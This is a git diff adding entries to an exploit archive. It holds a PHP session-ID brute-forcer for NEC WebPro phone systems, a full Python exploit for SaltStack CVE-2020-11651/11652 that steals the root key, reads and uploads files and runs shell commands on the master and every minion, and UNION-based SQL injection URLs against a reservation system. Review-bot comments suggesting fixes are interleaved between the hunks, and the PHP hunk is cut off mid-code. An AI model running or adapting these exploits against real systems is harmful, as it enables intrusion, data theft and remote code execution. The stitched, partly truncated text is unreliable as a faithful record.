diff --git a/exploits/hardware/webapps/48425.txt b/exploits/hardware/webapps/48425.txt new file mode 100644 index 000000000..c4a51d59b --- /dev/null +++ b/exploits/hardware/webapps/48425.txt @@ -0,0 +1,63 @@ +# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration +# Author: Cold z3ro +# Date: 2020-05-04 +# Homepage: https://www.0x30.cc/ +# Vendor Homepage: https://www.nec.com +# Version: 01.03.01 +# Discription: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration + += $maxproc) + { + while (pcntl_waitpid(0, $status) != -1) + { + $status = pcntl_wexitstatus($status); + $execute =0; + usleep(3000); + } + } + if (!$pid) + { + echo $url . " checking $i\n"; + login($url, $i); + flush(); + exit; + } +} + + +function login($url, $key) +{ + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, $url .'/PyxisUaMenu.htm?sessionId='.$key.'&MAINFRM(444,-1,591)#'); + curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); + curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80); + curl_setopt($ch, CURLOPT_TIMEOUT, 80); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); + curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); + curl_setopt($ch, CURLOPT_HEADER, FALSE); + $content = curl_exec($ch); + curl_close ($ch); + if(preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content)) + { + die("\n\n[+][-]".$url."/PyxisUaMenu.htm?sessionId=".$key."&MAINFRM(444,-1,591)# => Found\n\n"); + + } +} \ No newline at end of file diff --git a/exploits/multiple/remote/48421.txt b/exploits/multiple/remote/48421.txt new file mode 100644 index 000000000..5bd051b35 --- /dev/null +++ b/exploits/multiple/remote/48421.txt 
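Review bot: The PHP hunk is incomplete as rendered: the `+# Discription:` header line is followed directly by `= $maxproc)`, so the `<?php` opening, the argument handling and the head of the loop that `pcntl_waitpid` sits in are not visible here, and that loop's enclosing block starts outside what is shown. In `login()`, `CURLOPT_FOLLOWLOCATION` is TRUE while the verdict is a case-insensitive `preg_match` for 'Telephone' or 'Mailbox' on whatever page the redirect chain ends on, so a login or error page that happens to mention either word is reported as `Found`; the header should say that a hit is a candidate to be confirmed manually, not proof of a live session. The two `CURLOPT_SSL_VERIFY*` options are set to 0 without explanation; a one-line comment such as `// TLS verification disabled on purpose — TODO state why` would record the assumption for the next reader.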
@@ -0,0 +1,393 @@ +# Exploit Title: Saltstack 3000.1 - Remote Code Execution +# Date: 2020-05-04 +# Exploit Author: Jasper Lievisse Adriaanse +# Vendor Homepage: https://www.saltstack.com/ +# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.* +# Tested on: Debian 10 with Salt 2019.2.0 +# CVE : CVE-2020-11651 and CVE-2020-11652 +# Discription: Saltstack authentication bypass/remote code execution +# +# Source: https://github.com/jasperla/CVE-2020-11651-poc +# This exploit is based on this checker script: +# https://github.com/rossengeorgiev/salt-security-backports + +#!/usr/bin/env python +# +# Exploit for CVE-2020-11651 and CVE-2020-11652 +# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc) +# This exploit is based on this checker script: +# https://github.com/rossengeorgiev/salt-security-backports + +from __future__ import absolute_import, print_function, unicode_literals +import argparse +import datetime +import os +import os.path +import sys +import time + +import salt +import salt.version +import salt.transport.client +import salt.exceptions + +def init_minion(master_ip, master_port): + minion_config = { + 'transport': 'zeromq', + 'pki_dir': '/tmp', + 'id': 'root', + 'log_level': 'debug', + 'master_ip': master_ip, + 'master_port': master_port, + 'auth_timeout': 5, + 'auth_tries': 1, + 'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port) + } + + return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear') + +# --- check funcs ---- + +def check_salt_version(): + print("[+] Salt version: {}".format(salt.version.__version__)) + + vi = salt.version.__version_info__ + + if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)): + return True + else: + return False + +def check_connection(master_ip, master_port, channel): + print("[+] Checking salt-master ({}:{}) status... 
".format(master_ip, master_port), end='') + sys.stdout.flush() + + # connection check + try: + channel.send({'cmd':'ping'}, timeout=2) + except salt.exceptions.SaltReqTimeoutError: + print("OFFLINE") + sys.exit(1) + else: + print("ONLINE") + +def check_CVE_2020_11651(channel): + print("[+] Checking if vulnerable to CVE-2020-11651... ", end='') + sys.stdout.flush() + # try to evil + try: + rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3) + except salt.exceptions.SaltReqTimeoutError: + print("YES") + except: + print("ERROR") + raise + else: + pass + finally: + if rets: + root_key = rets[2]['root'] + return root_key + + return None + +def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path): + print("[+] Checking if vulnerable to CVE-2020-11652 (read_token)... ", end='') + sys.stdout.flush() + + # try read file + msg = { + 'cmd': 'get_token', + 'arg': [], + 'token': top_secret_file_path, + } + + try: + rets = channel.send(msg, timeout=3) + except salt.exceptions.SaltReqTimeoutError: + print("YES") + except: + print("ERROR") + raise + else: + if debug: + print() + print(rets) + print("NO") + +def check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key): + print("[+] Checking if vulnerable to CVE-2020-11652 (read)... ", end='') + sys.stdout.flush() + + # try read file + msg = { + 'key': root_key, + 'cmd': 'wheel', + 'fun': 'file_roots.read', + 'path': top_secret_file_path, + 'saltenv': 'base', + } + + try: + rets = channel.send(msg, timeout=3) + except salt.exceptions.SaltReqTimeoutError: + print("TIMEOUT") + except: + print("ERROR") + raise + else: + if debug: + print() + print(rets) + if rets['data']['return']: + print("YES") + else: + print("NO") + +def check_CVE_2020_11652_write1(debug, channel, root_key): + print("[+] Checking if vulnerable to CVE-2020-11652 (write1)... 
", end='') + sys.stdout.flush() + + # try read file + msg = { + 'key': root_key, + 'cmd': 'wheel', + 'fun': 'file_roots.write', + 'path': '../../../../../../../../tmp/salt_CVE_2020_11652', + 'data': 'evil', + 'saltenv': 'base', + } + + try: + rets = channel.send(msg, timeout=3) + except salt.exceptions.SaltReqTimeoutError: + print("TIMEOUT") + except: + print("ERROR") + raise + else: + if debug: + print() + print(rets) + + pp(rets) + if rets['data']['return'].startswith('Wrote'): + try: + os.remove('/tmp/salt_CVE_2020_11652') + except OSError: + print("Maybe?") + else: + print("YES") + else: + print("NO") + +def check_CVE_2020_11652_write2(debug, channel, root_key): + print("[+] Checking if vulnerable to CVE-2020-11652 (write2)... ", end='') + sys.stdout.flush() + + # try read file + msg = { + 'key': root_key, + 'cmd': 'wheel', + 'fun': 'config.update_config', + 'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652', + 'yaml_contents': 'evil', + 'saltenv': 'base', + } + + try: + rets = channel.send(msg, timeout=3) + except salt.exceptions.SaltReqTimeoutError: + print("TIMEOUT") + except: + print("ERROR") + raise + else: + if debug: + print() + print(rets) + if rets['data']['return'].startswith('Wrote'): + try: + os.remove('/tmp/salt_CVE_2020_11652.conf') + except OSError: + print("Maybe?") + else: + print("YES") + else: + print("NO") + +def pwn_read_file(channel, root_key, path, master_ip): + print("[+] Attemping to read {} from {}".format(path, master_ip)) + sys.stdout.flush() + + msg = { + 'key': root_key, + 'cmd': 'wheel', + 'fun': 'file_roots.read', + 'path': path, + 'saltenv': 'base', + } + + rets = channel.send(msg, timeout=3) + print(rets['data']['return'][0][path]) + +def pwn_upload_file(channel, root_key, src, dest, master_ip): + print("[+] Attemping to upload {} to {} on {}".format(src, dest, master_ip)) + sys.stdout.flush() + + try: + fh = open(src, 'rb') + payload = fh.read() + fh.close() + except Exception as e: + print('[-] Failed to read {}: 
{}'.format(src, e)) + return + + msg = { + 'key': root_key, + 'cmd': 'wheel', + 'fun': 'file_roots.write', + 'saltenv': 'base', + 'data': payload, + 'path': dest, + } + + rets = channel.send(msg, timeout=3) + print('[ ] {}'.format(rets['data']['return'])) + +def pwn_exec(channel, root_key, cmd, master_ip, jid): + print("[+] Attemping to execute {} on {}".format(cmd, master_ip)) + sys.stdout.flush() + + msg = { + 'key': root_key, + 'cmd': 'runner', + 'fun': 'salt.cmd', + 'saltenv': 'base', + 'user': 'sudo_user', + 'kwarg': { + 'fun': 'cmd.exec_code', + 'lang': 'python', + 'code': "import subprocess;subprocess.call('{}',shell=True)".format(cmd) + }, + 'jid': jid, + } + + try: + rets = channel.send(msg, timeout=3) + except Exception as e: + print('[-] Failed to submit job') + return + + if rets.get('jid'): + print('[+] Successfully scheduled job: {}'.format(rets['jid'])) + +def pwn_exec_all(channel, root_key, cmd, master_ip, jid): + print("[+] Attemping to execute '{}' on all minions connected to {}".format(cmd, master_ip)) + sys.stdout.flush() + + msg = { + 'key': root_key, + 'cmd': '_send_pub', + 'fun': 'cmd.run', + 'user': 'root', + 'arg': [ "/bin/sh -c '{}'".format(cmd) ], + 'tgt': '*', + 'tgt_type': 'glob', + 'ret': '', + 'jid': jid + } + + try: + rets = channel.send(msg, timeout=3) + except Exception as e: + print('[-] Failed to submit job') + return + finally: + if rets == None: + print('[+] Successfully submitted job to all minions.') + else: + print('[-] Failed to submit job') + + +def main(): + parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652') + parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1') + parser.add_argument('--port', '-p', dest='master_port', default='4506') + parser.add_argument('--force', '-f', dest='force', default=False, action='store_false') + parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true') + 
parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true') + parser.add_argument('--read', '-r', dest='read_file') + parser.add_argument('--upload-src', dest='upload_src') + parser.add_argument('--upload-dest', dest='upload_dest') + parser.add_argument('--exec', dest='exec', help='Run a command on the master') + parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions') + args = parser.parse_args() + + print("[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.") + time.sleep(1) + + # Both src and destination are required for uploads + if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None): + print('[-] Must provide both --upload-src and --upload-dest') + sys.exit(1) + + channel = init_minion(args.master_ip, args.master_port) + + if check_salt_version(): + print("[ ] This version of salt is vulnerable! Check results below") + elif args.force: + print("[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.") + else: + sys.exit() + + check_connection(args.master_ip, args.master_port, channel) + + root_key = check_CVE_2020_11651(channel) + if root_key: + print('\n[*] root key obtained: {}'.format(root_key)) + else: + print('[-] Failed to find root key...aborting') + sys.exit(127) + + if args.run_checks: + # Assuming this check runs on the master itself, create a file with "secret" content + # and abuse CVE-2020-11652 to read it. 
+ top_secret_file_path = '/tmp/salt_cve_teta' + with salt.utils.fopen(top_secret_file_path, 'w') as fd: + fd.write("top secret") + + # Again, this assumes we're running this check on the master itself + with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd: + root_key = keyfd.read() + + check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path) + check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key) + check_CVE_2020_11652_write1(debug, channel, root_key) + check_CVE_2020_11652_write2(debug, channel, root_key) + os.remove(top_secret_file_path) + sys.exit(0) + + if args.read_file: + pwn_read_file(channel, root_key, args.read_file, args.master_ip) + + if args.upload_src: + if os.path.isabs(args.upload_dest): + print('[-] Destination path must be relative; aborting') + sys.exit(1) + pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip) + + + jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow()) + + if args.exec: + pwn_exec(channel, root_key, args.exec, args.master_ip, jid) + + if args.exec_all: + print("[!] Lester, is this what you want? Hit ^C to abort.") + time.sleep(2) + pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid) + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/48413.txt b/exploits/php/webapps/48413.txt index 4891a3f3a..50cc95f4f 100644 --- a/exploits/php/webapps/48413.txt +++ b/exploits/php/webapps/48413.txt 
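Review bot: The `--run-checks` path — the one the banner recommends for verifying a patched master — cannot finish: `main()` passes a bare `debug` to the four `check_CVE_2020_11652_*` calls but never binds it (the parsed value is `args.debug`), and `check_CVE_2020_11652_write1` calls `pp(rets)` although nothing named `pp` is imported, so the run stops at a NameError before any result line is printed. `check_CVE_2020_11651` has a related problem: `rets` is bound only when `channel.send` returns, yet the `finally:` block reads it, so on a timeout the function prints its verdict and then raises UnboundLocalError; `rets = None` before the `try` avoids that. It is also worth stating in the header comment that `check_salt_version` inspects the locally imported salt library, not the `--master` host, so its "vulnerable" message describes where the script runs rather than the target.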
@@ -31,11 +31,4 @@ Parameter file: /scp/slass.php I used the name of the SLA for any ticket. -## Risk : cookie information of the target user is obtained. - -# Bu e-posta mesajı ve eklerinde yer alan içerikler gönderildiği kişi ya da firmaya özeldir. Ayrıca hukuken de gizli olabilir. Hiçbir şekilde üçüncü kişilere açıklanamaz ve yayınlanamaz. -# Eğer bu mesajı hataen aldıysanız lütfen durumu gönderen kişiye derhal bildiriniz ve mesajı sisteminizden siliniz. Mesajın yetkili alıcısı değilseniz hiçbir kısmını kopyalayamaz, başkasına -# gönderemez veya hiçbir şekilde bu mesajı kullanamazsınız. Eğer mesajın yetkili alıcısı veya yetkili alıcısına iletmekten sorumlu kişi siz değilseniz, lütfen mesajı sisteminizden siliniz -# ve göndereni uyarınız. İnternet iletişiminde tam güvenlik ve hatasız gönderim garanti edilemeyeceğinden; mesajın yerine ulaşmaması, geç ulaşması ya da içeriğinin bozulması gibi problemler -# de oluşabilir. Gönderen ve GAİS (Gais Siber Güvenlik Teknolojileri Ltd. Şti.) bu mesajın içerdiği bilgilerin doğruluğu, bütünlüğü ve güncelliği konusunda bir garanti vermemektedir. -# Mesajın içeriğinden, iletilmesinden, alınmasından, saklanmasından, gizliliğinin korunmamasından, virüs içermesinden ve sisteminizde yaratabileceği olası zararlardan GAİS sorumlu tutulamaz. \ No newline at end of file +## Risk : cookie information of the target user is obtained. \ No newline at end of file diff --git a/exploits/php/webapps/48417.txt b/exploits/php/webapps/48417.txt new file mode 100644 index 000000000..b54b9766e --- /dev/null +++ b/exploits/php/webapps/48417.txt 
@@ -0,0 +1,143 @@ +# Title: Fishing Reservation System 7.5 - 'uid' SQL Injection +# Author: Vulnerability Laboratory +# Date: 2020-05-05 +# Vendor: https://fishingreservationsystem.com/index.html +# Software: https://fishingreservationsystem.com/features.htm +# CVE: N/A + +Document Title: +=============== +Fishing Reservation System - Multiple Remote SQL Injection Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2243 + + +Common Vulnerability Scoring System: +==================================== +7.5 + + +Product & Service Introduction: +=============================== +(Copy of the Homepage: https://fishingreservationsystem.com/index.html +& https://fishingreservationsystem.com/features.htm ) + + + +Vulnerability Disclosure Timeline: +================================== +2020-05-04: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +Multiple remote sql-injection web vulnerabilities has been discovered in +the official Fishing Reservation System application. +The vulnerability allows remote attackers to inject or execute own sql +commands to compromise the dbms or file system of the application. + +The remote sql injection web vulnerabilites are located in the pid, type +and uid parameters of the admin.php control panel file. Guest accounts or +low privileged user accounts are able to inject and execute own +malicious sql commands as statement to compromise the local database and +affected +management system. The request method to inject/execute is GET and the +attack vector is client-side. The vulnerability is a classic order by +remote +sql injection web vulnerability. + +Exploitation of the remote sql injection vulnerability requires no user +interaction and a low privileged web-application user / guest account. 
+Successful exploitation of the remote sql injection results in database +management system, web-server and web-application compromise. + +Request Method(s): +[+] GET + +Vulnerable File(s): +[+] cart.php +[+] calender.php +[+] admin.php + +Vulnerable Parameter(s): +[+] uid +[+] pid +[+] type +[+] m +[+] y +[+] code + + +Proof of Concept (PoC): +======================= +The remote sql-injection web vulnerability can be exploited by remote +attackers with guest access or low privileged user account and without +user interaction action. +For security demonstration or to reproduce the remote sql injection web +vulnerability follow the provided information and steps below to continue. + + +PoC: Example +https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid='[SQL-INJECTION!]-- +https://frs.localhost:8080/system/admin.php?page=product/edit&type='[SQL-INJECTION!]-- +https://frs.localhost:8080/system/admin.php?page=user/edit&uid='[SQL-INJECTION!]--&PHPSESSID= +- +https://frs.localhost:8080/system/calendar.php?m='[SQL-INJECTION!]--&y=20&PHPSESSID= +https://frs.localhost:8080/system/calendar.php?m=02&y='[SQL-INJECTION!]--&PHPSESSID= +https://frs.localhost:8080/system/modules/cart.php?code='[SQL-INJECTION!]--&PHPSESSID= + + +PoC: Exploitation (SQL-Injection) +https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= +https://frs.localhost:8080/system/admin.php?page=product/edit&type=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&pid=2&PHPSESSID= +https://frs.localhost:8080/system/admin.php?page=user/edit&uid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= +- +https://frs.localhost:8080/system/calendar.php?m=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&y=20&PHPSESSID= 
+https://frs.localhost:8080/system/calendar.php?m=02&y=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= +https://frs.localhost:8080/system/modules/cart.php?code=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID= + + + +PoC: Exploit + + +Fishing Reservation System - SQL INJECTION EXPLOIT (PoC) +